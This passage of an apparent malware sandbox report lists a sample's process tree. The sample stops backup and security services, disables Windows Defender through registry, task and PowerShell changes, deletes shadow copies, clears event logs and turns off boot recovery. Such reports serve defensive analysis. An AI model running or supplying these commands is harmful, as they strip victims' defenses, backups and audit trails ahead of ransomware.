PID:588 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:544
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1072
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1688
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:396
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1100
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1808
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1368
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1332
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1204
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1476
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:2032
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:556
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1836
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:680
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:912
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1748
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1596
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1272
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:768
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1072
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1344
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1484
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1084
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1088
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1832
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1368
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1604
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1212
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1776
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:832
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1216
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1700
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1740
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1764
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:544
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1676
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:436
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1080
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1304
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1548
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:880
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:292
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:928
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1908
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1552
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1496
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1468
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1100 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1236
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1028 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1952 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:860 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1104 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1712 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1888 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1924 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1464 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1688
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:852 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:568
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:852 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2092
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2112
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5167090a23e64847bcc9891c90b399071
SHA18bf9030451446825ac778dd9f0d42e564a5166ba
SHA2562f6c04e155715a2efb59427bc2a4941c622fa9d51446b925a59a34cf323bbf48
SHA512529f1926c5741c272cafb437c7903e24f36fdbb0cc8ae2a0d8bdb93cd3a8be4386559f73ba2d09c18b36f3bd9e29081d782179427b7ea3cd090a6a28404c188a